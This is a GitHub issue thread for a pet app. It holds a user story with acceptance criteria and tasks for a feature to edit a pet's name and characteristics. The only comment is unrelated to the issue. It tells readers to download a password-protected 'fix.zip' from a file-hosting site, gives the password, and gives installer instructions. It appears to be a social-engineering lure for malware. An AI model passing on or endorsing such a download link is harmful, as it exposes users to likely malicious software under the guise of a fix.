### ISSUE TITLE
Update Pet

### ISSUE THREAD

**Issue by Inelukas** [Inelukas/pet-app#8]
## Value proposition

As a user
I want to update the name and/or characteristics,
so that they reflect the most accurate and relevant information.

## Description

![Image](https://github.com/user-attachments/assets/5d3edc11-4666-4984-ab52-606b8dfeb9c5)

## Acceptance criteria
- [ ] Each pet details page includes an easily accessible edit option.
- [ ] Clicking the edit option opens a new page with a form pre-filled with the pet’s existing details for modification.
- [ ] The form allows for the following edits:
   - [ ] Pet name
   - [ ] Pet characteristic

- [ ] The following fields are mandatory:
   - [ ] Pet name
   - [ ] Pet charactersistic

- [ ] The form section includes options for both saving and cancelling the action.
- [ ] The cancellation option allows the user to back out of the edit process if selected by mistake or if they change their mind.
- [ ] Submissions with empty required fields are blocked, with validation messages indicating the missing required fields.
- [ ] Upon confirming the save, the user is immediately redirected to the details page of the edited pet, and the changes are saved and reflected.

## Tasks
- [ ] Create feature branch feature/update-pet
- [ ] add edit link
   - [ ] the link should lead to an edit page that has a similar design to the create pet page
- [ ] only the name and characteristics fields should be editable
   - [ ] the changes should immediately be reflected in the indicators
- [ ] add cancel and confirm buttons
   - [ ] clicking on either button leads back to the details page
   - [ ] the edit button should only be clickable if the name and characteristics fields are not empty

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
